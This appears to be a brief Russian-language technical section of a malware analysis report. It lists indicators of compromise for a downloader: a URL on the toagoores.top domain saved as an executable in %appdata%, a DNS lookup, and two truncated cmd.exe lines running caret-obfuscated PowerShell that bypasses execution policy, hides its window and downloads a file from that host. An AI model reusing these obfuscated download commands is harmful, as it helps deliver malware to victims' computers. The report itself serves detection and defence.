Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^WE^rsHELL.E^xe -^exECUtiO^NP^olIcy^ ^b^ypass^ ^-n^o^PRo^fIle -^w^I^N^DoWSTyL^e H^ID^de^n^ ^(Ne^w-^O^B^jEct ^sYstEm.nE^T.^WeBcLI^e^Nt).^dOw^NlO^a^d^f^IlE(^'http://toagoores.to...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "P^O^WE^rsHELL.E^xe -^exECUtiO^NP^olIcy^ ^b^ypass^ ^-n^o^PRo^fIle -^w^I^N^DoWSTyL^e H^ID^de^n^ ^(Ne^w-^O^B^jEct ^sYstEm.nE^T.^WeBcLI^e^Nt).^dOw^NlO^a^d^f^IlE(^'http://toagoores.to...' (со скрытым окном)